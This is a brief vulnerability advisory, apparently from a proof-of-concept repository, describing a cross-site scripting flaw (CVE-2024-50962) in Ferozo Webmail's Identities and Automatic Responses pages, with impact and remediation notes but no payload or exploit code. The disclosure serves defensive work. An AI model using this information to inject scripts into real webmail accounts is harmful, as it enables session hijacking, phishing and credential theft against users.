疑似Oday
A Cross-Site Scripting (XSS) vulnerability## Cross-Site Scripting (XSS) in DonWeb Ferozo Webmail (CVE-2024-50962)
### Description
A Cross-Site Scripting (XSS) vulnerability in **Ferozo Webmail v1.1** allows attackers to execute arbitrary scripts via the **Identities** and **Automatic Responses** components. This vulnerability can be used to hijack user sessions, conduct phishing attacks, and steal credentials.
### Attack Complexity
- **Low**
### Privileges Required
- **None**
### User Interaction
- **Required** (Users need to interact with the component containing the injected script.)
### Affected Components
- **Identities Page and Automatic Responses**: Insufficient input validation allows malicious script injection.
### Impact
- **Session Hijacking**: Attackers can control user sessions.
- **Phishing**: Embedded iframes can be used to conduct phishing attacks.
### Remediation
- **Input Sanitization**: Implement robust input validation and sanitization.
- **XSS Filtering**: Apply a Content Security Policy (CSP) to prevent unauthorized script execution.
---
**CVE-2024-50962**
*Reported by [Facundo Fernandez / Security Researcher]*
[4.0K] /data/pocs/a73578a58012e7b140b930de926779be5ab0f144
└── [1.1K] README.md
0 directories, 1 file